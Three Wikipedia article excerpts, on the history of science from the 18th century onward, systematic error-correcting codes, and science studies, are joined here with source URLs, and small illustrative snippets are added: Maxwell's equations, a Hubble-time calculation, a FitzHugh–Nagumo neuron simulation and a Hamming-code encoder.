Modern geology, like modern chemistry, gradually evolved during the 18th and early 19th centuries. Benoît de Maillet and the Comte de Buffon saw the Earth as much older than the 6,000 years envisioned by biblical scholars. Jean-Étienne Guettard and Nicolas Desmarest hiked central France and recorded their observations on some of the first geological maps. Aided by chemical experimentation, naturalists such as Scotland's John Walker,[212] Sweden's Torbern Bergman, and Germany's Abraham Werner created comprehensive classification systems for rocks and minerals, a collective achievement that transformed geology into a cutting-edge field by the end of the eighteenth century. These early geologists also proposed generalized interpretations of Earth history that led James Hutton, Georges Cuvier and Alexandre Brongniart, following in the steps of Steno, to argue that layers of rock could be dated by the fossils they contained: a principle first applied to the geology of the Paris Basin. The use of index fossils became a powerful tool for making geological maps, because it allowed geologists to correlate the rocks in one locality with those of similar age in other, distant localities.
Adam Smith's An Inquiry into the Nature and Causes of the Wealth of Nations, published in 1776, forms the basis for classical economics. Smith criticized mercantilism, advocating a system of free trade with division of labour. He postulated an "invisible hand" that regulated economic systems made up of actors guided only by self-interest. Although the "invisible hand" is mentioned only in passing, in the middle of a chapter in the middle of the Wealth of Nations, it has come to be regarded as Smith's central message.
Anthropology can best be understood as an outgrowth of the Age of Enlightenment. It was during this period that Europeans attempted systematically to study human behavior. Traditions of jurisprudence, history, philology and sociology developed during this time and informed the development of the social sciences of which anthropology was a part.
The 19th century saw the birth of science as a profession. William Whewell coined the term scientist in 1833,[213] which soon replaced the older term natural philosopher.
In physics, the behavior of electricity and magnetism was studied by Giovanni Aldini, Alessandro Volta, Michael Faraday, Georg Ohm, and others. The experiments, theories and discoveries of Michael Faraday, André-Marie Ampère, James Clerk Maxwell, and their contemporaries led to the unification of the two phenomena into a single theory of electromagnetism, as described by Maxwell's equations. Thermodynamics led to an understanding of heat, and the notion of energy was defined.
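In the vector notation later introduced by Oliver Heaviside (Maxwell's original presentation used many more component equations), Maxwell's equations in vacuum with sources read:

```latex
% Gauss's law: charge density \rho sources the electric field.
\nabla \cdot \vec{E} = \frac{\rho}{\varepsilon_0}

% No magnetic monopoles.
\nabla \cdot \vec{B} = 0

% Faraday's law of induction.
\nabla \times \vec{E} = -\frac{\partial \vec{B}}{\partial t}

% Ampère's law with Maxwell's displacement-current term.
\nabla \times \vec{B} = \mu_0 \vec{J} + \mu_0 \varepsilon_0 \frac{\partial \vec{E}}{\partial t}
```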
In astronomy, advances in optical systems in the 19th century resulted in the first observation of an asteroid (1 Ceres) in 1801 and the discovery of the planet Neptune in 1846.
In mathematics, the notion of complex numbers finally matured and led to a subsequent analytical theory; mathematicians also began the use of hypercomplex numbers. Karl Weierstrass and others carried out the arithmetization of analysis for functions of real and complex variables. The century also saw new progress in geometry beyond the classical theories of Euclid, after a period of nearly two thousand years. The mathematical science of logic likewise had revolutionary breakthroughs after a similarly long period of stagnation. But the most important step in science at this time was the set of ideas formulated by the creators of electrical science. Their work changed the face of physics and made possible new technologies such as electric power, electrical telegraphy, the telephone, and radio.
In chemistry, Dmitri Mendeleev, following the atomic theory of John Dalton, created the first periodic table of elements. Other highlights include the discoveries unveiling the nature of atomic structure and matter, and of new kinds of radiation. The theory that all matter is made of atoms, which are the smallest constituents of matter that cannot be broken down without losing the basic chemical and physical properties of that matter, was provided by John Dalton in 1803, although the question took a hundred years to settle. Dalton also formulated the law of mass relationships. In 1869, Dmitri Mendeleev composed his periodic table of elements on the basis of Dalton's discoveries. The synthesis of urea by Friedrich Wöhler opened a new research field, organic chemistry, and by the end of the 19th century, scientists were able to synthesize hundreds of organic compounds. The later part of the 19th century saw the exploitation of the Earth's petrochemicals, after the exhaustion of the oil supply from whaling. By the 20th century, systematic production of refined materials provided a ready supply of products which provided not only energy, but also synthetic materials for clothing, medicine, and everyday disposable resources. Application of the techniques of organic chemistry to living organisms resulted in physiological chemistry, the precursor to biochemistry.[214]
Over the first half of the 19th century, geologists such as Charles Lyell, Adam Sedgwick, and Roderick Murchison applied the new technique to rocks throughout Europe and eastern North America, setting the stage for more detailed, government-funded mapping projects in later decades. Midway through the 19th century, the focus of geology shifted from description and classification to attempts to understand how the surface of the Earth had changed. The first comprehensive theories of mountain building were proposed during this period, as were the first modern theories of earthquakes and volcanoes. Louis Agassiz and others established the reality of continent-covering ice ages, and "fluvialists" like Andrew Crombie Ramsay argued that river valleys were formed, over millions of years, by the rivers that flow through them. After the discovery of radioactivity, radiometric dating methods were developed, starting in the 20th century. Alfred Wegener's theory of "continental drift" was widely dismissed when he proposed it in the 1910s,[215] but new data gathered in the 1950s and 1960s led to the theory of plate tectonics, which provided a plausible mechanism for it. Plate tectonics also provided a unified explanation for a wide range of seemingly unrelated geological phenomena. Since the 1960s it has served as the unifying principle in geology.[216]
Perhaps the most prominent, controversial, and far-reaching theory in all of science has been the theory of evolution by natural selection, which was independently formulated by Charles Darwin and Alfred Wallace. It was described in detail in Darwin's book The Origin of Species, which was published in 1859. In it, Darwin proposed that the features of all living things, including humans, were shaped by natural processes over long periods of time. The theory of evolution in its current form affects almost all areas of biology.[217] Implications of evolution on fields outside of pure science have led to both opposition and support from different parts of society, and profoundly influenced the popular understanding of "man's place in the universe". Separately, Gregor Mendel formulated the principles of inheritance in 1866, which became the basis of modern genetics.
Another important landmark in medicine and biology was the successful effort to prove the germ theory of disease. In 1847, Hungarian physician Ignác Fülöp Semmelweis dramatically reduced the occurrence of puerperal fever by simply requiring physicians to wash their hands before attending to women in childbirth. This discovery predated the germ theory of disease. However, Semmelweis' findings were not appreciated by his contemporaries, and handwashing came into use only with the discoveries of British surgeon Joseph Lister, who in 1865 proved the principles of antisepsis. Lister's work was based on the important findings of French biologist Louis Pasteur. Pasteur was able to link microorganisms with disease, revolutionizing medicine; he also made many discoveries in the field of chemistry, including the asymmetry of crystals. Pasteur devised one of the most important methods in preventive medicine when, in 1885, he produced a vaccine against rabies, and he invented the process of pasteurization to help prevent the spread of disease through milk and other foods.[218]
Karl Marx developed an alternative economic theory, called Marxian economics. Marxian economics is based on the labor theory of value and assumes the value of a good to be based on the amount of labor required to produce it. Under this axiom, capitalism was based on employers not paying the full value of workers' labor in order to create profit. The Austrian School responded to Marxian economics by viewing entrepreneurship as the driving force of economic development. This replaced the labor theory of value with a system of supply and demand.
Psychology as a scientific enterprise independent from philosophy began in 1879, when Wilhelm Wundt founded the first laboratory dedicated exclusively to psychological research (in Leipzig). Other important early contributors to the field include Hermann Ebbinghaus (a pioneer in memory studies), Ivan Pavlov (who discovered classical conditioning), William James, and Sigmund Freud. Freud's influence has been enormous, though more as a cultural icon than as a force in scientific psychology.[citation needed]
Modern sociology emerged in the early 19th century as the academic response to the modernization of the world. Among many early sociologists (e.g., Émile Durkheim), the aim of sociology was in structuralism: understanding the cohesion of social groups and developing an "antidote" to social disintegration. Max Weber was concerned with the modernization of society through the concept of rationalization, which he believed would trap individuals in an "iron cage" of rational thought. Some sociologists, including Georg Simmel and W. E. B. Du Bois, used more microsociological, qualitative analyses. This microlevel approach played an important role in American sociology, with the theories of George Herbert Mead and his student Herbert Blumer resulting in the creation of the symbolic interactionism approach to sociology. In particular, Auguste Comte illustrated with his work the transition from a theological to a metaphysical stage and, from this, to a positive stage. Comte also undertook the classification of the sciences, as well as describing a transition of humanity towards a state of progress, attributable to a re-examination of nature according to the affirmation of 'sociality' as the basis of a scientifically interpreted society.[219]
The Romantic Movement of the early 19th century reshaped science by opening up new pursuits unexpected in the classical approaches of the Enlightenment. The decline of Romanticism occurred because a new movement, Positivism, began to take hold of the ideals of the intellectuals after 1840 and lasted until about 1880. At the same time, the romantic reaction to the Enlightenment produced thinkers such as Johann Gottfried Herder and later Wilhelm Dilthey, whose work formed the basis for the culture concept which is central to the discipline of anthropology. Traditionally, much of the history of the subject was based on colonial encounters between Western Europe and the rest of the world, and much of 18th- and 19th-century anthropology is now classed as scientific racism. During the late 19th century, battles over the "study of man" took place between those of an "anthropological" persuasion (relying on anthropometrical techniques) and those of an "ethnological" persuasion (looking at cultures and traditions), and these distinctions became part of the later divide between physical anthropology and cultural anthropology, the latter ushered in by the students of Franz Boas.
Science advanced dramatically during the 20th century. There were new and radical developments in the physical and life sciences, building on the progress from the 19th century.[220]
The beginning of the 20th century brought the start of a revolution in physics. The long-held theories of Newton were shown not to be correct in all circumstances. Beginning in 1900, Max Planck, Albert Einstein, Niels Bohr and others developed quantum theories to explain various anomalous experimental results by introducing discrete energy levels. Not only did quantum mechanics show that the laws of motion did not hold on small scales, but the theory of general relativity, proposed by Einstein in 1915, showed that the fixed background of spacetime, on which both Newtonian mechanics and special relativity depended, could not exist. In 1925, Werner Heisenberg and Erwin Schrödinger formulated quantum mechanics, which explained the preceding quantum theories. Currently, general relativity and quantum mechanics are inconsistent with each other, and efforts are underway to unify the two.[221]
The observation by Edwin Hubble in 1929 that the speed at which galaxies recede positively correlates with their distance led to the understanding that the universe is expanding, and to the formulation of the Big Bang theory by Georges Lemaître. George Gamow, Ralph Alpher, and Robert Herman had calculated that there should be evidence for a Big Bang in the background temperature of the universe.[222] In 1964, Arno Penzias and Robert Wilson[223] discovered a 3 kelvin background hiss in their Bell Labs radio telescope (the Holmdel Horn Antenna), which was evidence for this hypothesis and formed the basis for a number of results that helped determine the age of the universe.
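The correlation Hubble observed is expressed as Hubble's law, v = H0 · d, and its inverse 1/H0 (the "Hubble time") gives a first-order estimate of the age of the universe. A minimal sketch, assuming the modern value H0 ≈ 70 km/s/Mpc for illustration (Hubble's own 1929 estimate was several times larger):

```python
# Hubble's law: recession velocity v = H0 * d. The characteristic
# timescale 1/H0 is a rough, first-order estimate of the age of the
# universe. H0 = 70 km/s/Mpc is an assumed modern value, used purely
# for illustration.

KM_PER_MPC = 3.0857e19   # kilometres in one megaparsec
H0 = 70.0                # Hubble constant, km/s per Mpc (assumption)

H0_per_sec = H0 / KM_PER_MPC              # convert H0 to units of 1/s
hubble_time_s = 1.0 / H0_per_sec          # Hubble time in seconds
hubble_time_gyr = hubble_time_s / (3.156e7 * 1e9)  # to billions of years

print(f"Hubble time = {hubble_time_gyr:.1f} Gyr")  # roughly 14 Gyr
```

The agreement of this crude estimate with independent age determinations (oldest stars, cosmic microwave background fits) is part of what made the expanding-universe picture compelling.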
In 1938 Otto Hahn and Fritz Strassmann discovered nuclear fission with radiochemical methods, and in 1939 Lise Meitner and Otto Robert Frisch wrote the first theoretical interpretation of the fission process, which was later improved by Niels Bohr and John A. Wheeler. Further developments took place during World War II, which led to the practical application of radar and the development and use of the atomic bomb. Around this time, Chien-Shiung Wu was recruited by the Manhattan Project to help develop a process for separating uranium metal into U-235 and U-238 isotopes by gaseous diffusion.[224] She was an expert experimentalist in beta decay and weak interaction physics.[225][226] Wu designed an experiment (see Wu experiment) that enabled theoretical physicists Tsung-Dao Lee and Chen-Ning Yang to disprove the law of parity experimentally, winning them a Nobel Prize in 1957.[225]
Though the process had begun with the invention of the cyclotron by Ernest O. Lawrence in the 1930s, physics in the postwar period entered into a phase of what historians have called "Big Science", requiring massive machines, budgets, and laboratories in order to test theories and move into new frontiers. The primary patron of physics became state governments, who recognized that the support of "basic" research could often lead to technologies useful to both military and industrial applications.
In the early 20th century, the study of heredity became a major investigation after the rediscovery in 1900 of the laws of inheritance developed by Mendel.[227] The 20th century also saw the integration of physics and chemistry, with chemical properties explained as the result of the electronic structure of the atom. Linus Pauling's book The Nature of the Chemical Bond used the principles of quantum mechanics to deduce bond angles in ever-more complicated molecules. Pauling's work culminated in the physical modelling of DNA, "the secret of life" (in the words of Francis Crick, 1953). In the same year, the Miller–Urey experiment demonstrated, in a simulation of primordial processes, that basic constituents of proteins, simple amino acids, could themselves be built up from simpler molecules, kickstarting decades of research into the chemical origins of life. In 1953, James D. Watson and Francis Crick clarified the basic structure of DNA, the genetic material for expressing life in all its forms.[228] Building on the work of Maurice Wilkins and Rosalind Franklin, their famous paper "Molecular Structure of Nucleic Acids" suggested that the structure of DNA was a double helix.[228] In the late 20th century, the possibilities of genetic engineering became practical for the first time, and a massive international effort began in 1990 to map out an entire human genome (the Human Genome Project).
The discipline of ecology typically traces its origin to the synthesis of Darwinian evolution and Humboldtian biogeography in the late 19th and early 20th centuries.[229] Equally important in the rise of ecology, however, were microbiology and soil science, particularly the cycle of life concept prominent in the work of Louis Pasteur and Ferdinand Cohn.[230] The word ecology was coined by Ernst Haeckel, whose particularly holistic view of nature in general (and Darwin's theory in particular) was important in the spread of ecological thinking.[231] The field of ecosystem ecology emerged in the Atomic Age with the use of radioisotopes to visualize food webs, and by the 1970s ecosystem ecology deeply influenced global environmental management.[232]
In 1925, Cecilia Payne-Gaposchkin determined that stars were composed mostly of hydrogen and helium.[233] She was dissuaded by astronomer Henry Norris Russell from publishing this finding in her PhD thesis because of the widely held belief that stars had the same composition as the Earth.[234] However, four years later, in 1929, Henry Norris Russell came to the same conclusion through different reasoning, and the discovery was eventually accepted.[234]
In 1987, supernova SN 1987A was observed by astronomers on Earth both visually and, in a triumph for neutrino astronomy, by the solar neutrino detectors at Kamiokande. But the solar neutrino flux was a fraction of its theoretically expected value. This discrepancy forced a change in some values in the standard model for particle physics.
The understanding of neurons and the nervous system became increasingly precise and molecular during the 20th century. For example, in 1952, Alan Lloyd Hodgkin and Andrew Huxley presented a mathematical model for transmission of electrical signals in neurons of the giant axon of a squid, which they called "action potentials", and how they are initiated and propagated, known as the Hodgkin–Huxley model. In 1961–1962, Richard FitzHugh and J. Nagumo simplified Hodgkin–Huxley in what is called the FitzHugh–Nagumo model. In 1962, Bernard Katz modeled neurotransmission across the space between neurons known as synapses. Beginning in 1966, Eric Kandel and collaborators examined biochemical changes in neurons associated with learning and memory storage in Aplysia. In 1981, Catherine Morris and Harold Lecar combined these models in the Morris–Lecar model. Such increasingly quantitative work gave rise to numerous biological neuron models and models of neural computation. Neuroscience began to be recognized as a distinct academic discipline in its own right. Eric Kandel and collaborators have cited David Rioch, Francis O. Schmitt, and Stephen Kuffler as having played critical roles in establishing the field.[235]
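The FitzHugh–Nagumo simplification mentioned above reduces the four variables of Hodgkin–Huxley to two: a fast voltage-like variable v and a slow recovery variable w. A minimal sketch integrating the model with forward Euler; the parameter values are common textbook choices, not taken from the original 1961–1962 papers:

```python
# Forward-Euler integration of the FitzHugh-Nagumo model, a two-variable
# simplification of Hodgkin-Huxley. v is the fast membrane potential,
# w the slow recovery variable. Parameters are standard textbook values
# (an assumption), chosen so that sustained input produces spiking.

def fitzhugh_nagumo(I_ext=0.5, a=0.7, b=0.8, tau=12.5, dt=0.01, steps=50000):
    v, w = -1.0, -0.5
    trace = []
    for _ in range(steps):
        dv = v - v**3 / 3.0 - w + I_ext   # cubic nonlinearity drives the spike
        dw = (v + a - b * w) / tau        # slow linear recovery
        v += dt * dv
        w += dt * dw
        trace.append(v)
    return trace

trace = fitzhugh_nagumo()
# With this sustained input current the model fires repeatedly: after the
# transient, v oscillates between roughly -2 and +2 instead of settling.
print(min(trace[25000:]), max(trace[25000:]))
```

With the external current set near zero the same code instead relaxes to a resting state, which is why the model is often used to illustrate the threshold behavior of excitable membranes.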
Geologists' embrace of plate tectonics became part of a broadening of the field from a study of rocks into a study of the Earth as a planet. Other elements of this transformation include: geophysical studies of the interior of the Earth, the grouping of geology with meteorology and oceanography as one of the "earth sciences", and comparisons of Earth and the solar system's other rocky planets.
In terms of applications, a massive number of new technologies were developed in the 20th century. Technologies such as electricity, the incandescent light bulb, the automobile and the phonograph, first developed at the end of the 19th century, were perfected and universally deployed. The first car was introduced by Karl Benz in 1885.[236] The first airplane flight occurred in 1903, and by the end of the century airliners flew thousands of miles in a matter of hours. The development of the radio, television and computers caused massive changes in the dissemination of information. Advances in biology also led to large increases in food production, as well as the elimination of diseases such as polio by Dr. Jonas Salk. Gene mapping and gene sequencing, invented by Drs. Mark Skolnik and Walter Gilbert, respectively, are the two technologies that made the Human Genome Project feasible. Computer science, built upon a foundation of theoretical linguistics, discrete mathematics, and electrical engineering, studies the nature and limits of computation. Subfields include computability, computational complexity, database design, computer networking, artificial intelligence, and the design of computer hardware. One area in which advances in computing have contributed to more general scientific development is by facilitating large-scale archiving of scientific data. Contemporary computer science typically distinguishes itself by emphasizing mathematical 'theory' in contrast to the practical emphasis of software engineering.[237]
Einstein's paper "On the Quantum Theory of Radiation" outlined the principles of the stimulated emission of photons. This led to the invention of the laser (light amplification by stimulated emission of radiation) and the optical amplifier, which ushered in the Information Age.[238] It is optical amplification that allows fiber optic networks to transmit the massive capacity of the Internet.
Based on wireless transmission of electromagnetic radiation and global networks of cellular operation, the mobile phone became a primary means to access the internet.[239]
In political science during the 20th century, the study of ideology, behaviouralism and international relations led to a multitude of 'pol-sci' subdisciplines including rational choice theory, voting theory, game theory (also used in economics), psephology, political geography/geopolitics, political anthropology/political psychology/political sociology, political economy, policy analysis, public administration, comparative political analysis and peace studies/conflict analysis. In economics, John Maynard Keynes prompted a division between microeconomics and macroeconomics in the 1920s. Under Keynesian economics, macroeconomic trends can overwhelm economic choices made by individuals. Governments should promote aggregate demand for goods as a means to encourage economic expansion. Following World War II, Milton Friedman created the concept of monetarism. Monetarism focuses on using the supply and demand of money as a method for controlling economic activity. In the 1970s, monetarism was adapted into supply-side economics, which advocates reducing taxes as a means to increase the amount of money available for economic expansion. Other modern schools of economic thought are New Classical economics and New Keynesian economics. New Classical economics was developed in the 1970s, emphasizing solid microeconomics as the basis for macroeconomic growth. New Keynesian economics was created partially in response to New Classical economics. It shows how imperfect competition and market rigidities mean that monetary policy has real effects, and it enables the analysis of different policies.[240]
Psychology in the 20th century saw a rejection of Freud's theories as being too unscientific, and a reaction against Edward Titchener's atomistic approach to the mind. This led to the formulation of behaviorism by John B. Watson, which was popularized by B. F. Skinner. Behaviorism proposed epistemologically limiting psychological study to overt behavior, since that could be reliably measured. Scientific knowledge of the "mind" was considered too metaphysical, hence impossible to achieve. The final decades of the 20th century saw the rise of cognitive science, which considers the mind as once again a subject for investigation, using the tools of psychology, linguistics, computer science, philosophy, and neurobiology. New methods of visualizing the activity of the brain, such as PET scans and CAT scans, began to exert their influence as well, leading some researchers to investigate the mind by investigating the brain, rather than cognition. These new forms of investigation assume that a wide understanding of the human mind is possible, and that such an understanding may be applied to other research domains, such as artificial intelligence. Evolutionary theory was applied to behavior and introduced to anthropology and psychology through the works of cultural anthropologist Napoleon Chagnon. Physical anthropology would become biological anthropology, incorporating elements of evolutionary biology.[241]
American sociology in the 1940s and 1950s was dominated largely by Talcott Parsons, who argued that aspects of society that promoted structural integration were therefore "functional". This structural functionalism approach was questioned in the 1960s, when sociologists came to see it as merely a justification for inequalities present in the status quo. In reaction, conflict theory was developed, based in part on the philosophies of Karl Marx. Conflict theorists saw society as an arena in which different groups compete for control over resources. Symbolic interactionism also came to be regarded as central to sociological thinking. Erving Goffman saw social interactions as a stage performance, with individuals preparing "backstage" and attempting to control their audience through impression management.[242] While these theories are currently prominent in sociological thought, other approaches exist, including feminist theory, post-structuralism, rational choice theory, and postmodernism.
In the mid-20th century, much of the methodologies of earlier anthropological and ethnographical study were reevaluated with an eye towards research ethics, while at the same time the scope of investigation has broadened far beyond the traditional study of "primitive cultures".
In the early 21st century, some concepts that originated in 20th century physics were confirmed experimentally. On 4 July 2012, physicists working at CERN's Large Hadron Collider announced that they had discovered a new subatomic particle greatly resembling the Higgs boson,[243] confirmed as such by the following March.[244] Gravitational waves were first detected on 14 September 2015.[245]
The Human Genome Project was declared complete in 2003.[246] The CRISPR gene editing technique, developed in 2012, allowed scientists to precisely and easily modify DNA and led to the development of new medicines.[247] In 2020, xenobots, a new class of living robotics, were invented;[248] reproductive capabilities were introduced the following year.[249]
Positive psychology is a branch of psychology founded in 1998 by Martin Seligman that is concerned with the study of happiness, mental well-being, and positive human functioning, and is a reaction to 20th century psychology's emphasis on mental illness and dysfunction.[250]
|
https://en.wikipedia.org/wiki/History_of_science
|
In coding theory, a systematic code is any error-correcting code in which the input data are embedded in the encoded output. Conversely, in a non-systematic code the output does not contain the input symbols.
Systematic codes have the advantage that the parity data can simply be appended to the source block, and receivers do not need to recover the original source symbols if they are received correctly – this is useful, for example, if error-correction coding is combined with a hash function for quickly determining the correctness of the received source symbols, or in cases where errors occur as erasures and a received symbol is thus always correct. Furthermore, for engineering purposes such as synchronization and monitoring, it is desirable to get reasonably good estimates of the received source symbols without going through the lengthy decoding process, which may be carried out at a remote site at a later time.[1]
Every non-systematic linear code can be transformed into a systematic code with essentially the same properties (i.e., minimum distance).[1][2] Because of the advantages cited above, linear error-correcting codes are therefore generally implemented as systematic codes. However, for certain decoding algorithms such as sequential decoding or maximum-likelihood decoding, a non-systematic structure can increase performance in terms of undetected decoding error probability when the minimum free distance of the code is larger.[1][3]
For a systematic linear code, the generator matrix G can always be written as G = [I_k | P], where I_k is the identity matrix of size k.
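The systematic form G = [I_k | P] means the first k encoded bits are the message itself, with parity bits appended. A minimal sketch over GF(2), using the parity submatrix of the classic (7,4) Hamming code as P (this particular P is one standard choice, used here only for illustration):

```python
# Systematic linear block code over GF(2): the generator matrix has the
# form G = [I_k | P], so encoding copies the k message bits verbatim and
# appends parity bits computed from P. P below is one standard parity
# submatrix of the (7,4) Hamming code (an assumed, illustrative choice).

K = 4
P = [
    [1, 1, 0],
    [1, 0, 1],
    [0, 1, 1],
    [1, 1, 1],
]

def encode(msg):
    """Systematic encoding: message bits first, then mod-2 parity bits."""
    assert len(msg) == K
    parity = [
        sum(msg[i] * P[i][j] for i in range(K)) % 2  # mod-2 dot product
        for j in range(len(P[0]))
    ]
    return list(msg) + parity

cw = encode([1, 0, 1, 1])
print(cw)  # -> [1, 0, 1, 1, 0, 1, 0]: the message appears unchanged up front
```

Because the message sits unchanged in the codeword, a receiver that verifies the parity (or a hash, as the article notes) can use the source symbols directly without any decoding step.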
|
https://en.wikipedia.org/wiki/Systematic_code
|
Science studies is an interdisciplinary research area that seeks to situate scientific expertise in broad social, historical, and philosophical contexts. It uses various methods to analyze the production, representation and reception of scientific knowledge and its epistemic and semiotic role.
Similarly to cultural studies, science studies are defined by the subject of their research and encompass a large range of different theoretical and methodological perspectives and practices. The interdisciplinary approach may include and borrow methods from the humanities and the natural and formal sciences, from scientometrics to ethnomethodology or cognitive science.
Science studies have a certain importance for evaluation and science policy. Overlapping with the field of science, technology and society, practitioners study the relationship between science and technology, and the interaction of expert and lay knowledge in the public realm.
The field started with a tendency toward navel-gazing: it was extremely self-conscious in its genesis and applications.[1] From early concerns with scientific discourse, practitioners soon started to deal with the relation of scientific expertise to politics and lay people.[1] Practical examples include bioethics, bovine spongiform encephalopathy (BSE), pollution, global warming,[2][3] biomedical sciences, physical sciences, natural hazard predictions, the (alleged) impact of the Chernobyl disaster in the UK, generation and review of science policy, and risk governance and its historical and geographic contexts.[1] While remaining a discipline with multiple metanarratives, the fundamental concern is the role of the perceived expert in providing governments and local authorities with information from which they can make decisions.[1]
The approach poses various important questions about what makes an expert, and about how experts and their authority are to be distinguished from the lay population and interact with the values and policy-making process in liberal democratic societies.[1]
Practitioners examine the forces within and through which scientists investigate specific phenomena such as
In 1935, in a celebrated paper, the Polish sociologist couple Maria Ossowska and Stanisław Ossowski proposed the founding of a "science of science" to study the scientific enterprise, its practitioners, and the factors influencing their work.[10][11] Earlier, in 1923, the Polish sociologist Florian Znaniecki had made a similar proposal.[12]
Fifty years before Znaniecki, in 1873, Aleksander Głowacki, better known in Poland by his pen name "Bolesław Prus", had delivered a public lecture – later published as a booklet – On Discoveries and Inventions, in which he said:
Until now there has been no science that describes the means for making discoveries and inventions, and the generality of people, as well as many people of learning, believe that there never will be. This is an error. Someday a science of making discoveries and inventions will exist and will render services. It will arise not all at once; first only its general outline will appear, which subsequent researchers will correct and elaborate, and which still later researchers will apply to individual branches of knowledge.[13]
It is striking that, while early 20th-century sociologist proponents of a discipline to study science and its practitioners wrote in general theoretical terms, Prus had already half a century earlier described, with many specific examples, the scope and methods of such a discipline.
Thomas Kuhn's Structure of Scientific Revolutions (1962) increased interest both in the history of science and in science's philosophical underpinnings. Kuhn posited that the history of science was less a linear succession of discoveries than a succession of paradigms within the philosophy of science. Paradigms are broader, socio-intellectual constructs that determine which types of truth claims are permissible.
Science studies seeks to identify key dichotomies – such as those between science and technology, nature and culture, theory and experiment, and science and fine art – leading to the differentiation of scientific fields and practices.
The sociology of scientific knowledge arose at the University of Edinburgh, where David Bloor and his colleagues developed what has been termed "the strong programme". It proposed that both "true" and "false" scientific theories should be treated the same way.[14] Both are informed by social factors such as cultural context and self-interest.[15]
Human knowledge, abiding as it does within human cognition, is ineluctably influenced by social factors.[16]
It proved difficult, however, to address natural-science topics with sociological methods, as was abundantly evidenced by the US science wars.[17] Use of a deconstructive approach (as in relation to works on arts or religion) to the natural sciences risked endangering not only the "hard facts" of the natural sciences, but the objectivity and positivist tradition of sociology itself.[17] The view of scientific knowledge production as an (at least partially) social construct was not easily accepted.[1] Latour and others identified a dichotomy crucial for modernity: the division between nature (things, objects) as transcendent, there to be discovered, and society (the subject, the state) as immanent, artificial, constructed. This dichotomy made possible the mass production of things (technical-natural hybrids) and large-scale global issues that endanger the distinction as such. For example, We Have Never Been Modern asks us to reconnect the social and natural worlds, returning to the pre-modern use of "thing",[18] addressing objects as hybrids made and scrutinized through the public interaction of people, things, and concepts.[19]
Science studies scholars such as Trevor Pinch and Steve Woolgar started already in the 1980s to involve "technology", and called their field "science, technology and society".[20] This "turn to technology" brought science studies into communication with academics in science, technology, and society programs.
More recently, a novel approach known as mapping controversies has been gaining momentum among science studies practitioners, and was introduced as a course for students in engineering[21][22] and architecture schools.[23] In 2002, Harry Collins and Robert Evans called for a third wave of science studies (a pun on The Third Wave), namely studies of expertise and experience responding to recent tendencies to dissolve the boundary between experts and the public.[24]
A showcase of the rather complex problems of scientific information and its interaction with lay persons is Brian Wynne's study of sheep farming in Cumbria after the Chernobyl disaster.[1][25] He elaborated on the responses of sheep farmers in Cumbria, who had been subjected to administrative restrictions because of radioactive contamination allegedly caused by the nuclear accident at Chernobyl in 1986.[25] The sheep farmers suffered economic losses, and their resistance against the imposed regulation was deemed irrational and inadequate.[25] It turned out that the source of radioactivity was actually the Sellafield nuclear reprocessing complex; thus, the experts who were responsible for the duration of the restrictions were completely mistaken.[25] The example led to attempts to better involve local knowledge and lay persons' experience, and to assess its often highly geographically and historically defined background.[26]
Donovan et al. (2012) used social studies of volcanology to investigate the generation of knowledge and expert advice on various active volcanoes.[1] It contains a survey of volcanologists carried out during 2008 and 2009, and interviews with scientists in the UK, Montserrat, Italy and Iceland during fieldwork seasons. Donovan et al. (2012) asked the experts about the felt purpose of volcanology and what they considered the most important eruptions in historical time. The survey tries to identify eruptions that had an influence on volcanology as a science and to assess the role of scientists in policymaking.[1]
A main focus was the impact of the 1997 Montserrat eruption. The eruption, a classic example of black swan theory,[27] directly killed only 19 persons. However, the outbreak had major impacts on the local society and destroyed important infrastructure, such as the island's airport.[28] About 7,000 people, or two-thirds of the population, left Montserrat; 4,000 went to the United Kingdom.[29]
The Montserrat case put immense pressure on volcanologists, as their expertise suddenly became the primary driver of various public policy approaches.[1] The science studies approach provided valuable insights in that situation.[1] There were various miscommunications among scientists. Matching scientific uncertainty (typical of volcanic unrest) with the request for a single unified voice for political advice was a challenge.[1] The Montserrat volcanologists began to use statistical elicitation models to estimate the probabilities of particular events, a rather subjective method, but one allowing consensus and experience-based expertise to be synthesized step by step.[1] It also incorporated local knowledge and experience.[1]
Volcanology as a science currently faces a shift in its epistemological foundations. The field has started to involve more research into risk assessment and risk management. This requires new, integrated methodologies for knowledge collection that transcend scientific disciplinary boundaries and combine qualitative and quantitative outcomes in a structured whole.[30]
Science has become a major force in Western democratic societies, which depend on innovation and technology (compare Risk society) to address their risks.[31] Beliefs about science can be very different from those of the scientists themselves, for reasons of, e.g., moral values, epistemology or political motivations. The designation of expertise as authoritative in the interaction with lay people and decision makers of all kinds is nevertheless challenged in contemporary risk societies, as suggested by scholars who follow Ulrich Beck's theorisation. The role of expertise in contemporary democracies is an important theme for debate among science studies scholars. Some argue for a more widely distributed, pluralist understanding of expertise (Sheila Jasanoff and Brian Wynne, for example), while others argue for a more nuanced understanding of the idea of expertise and its social functions (Collins and Evans, for example).[32][33]
|
https://en.wikipedia.org/wiki/Science_studies
|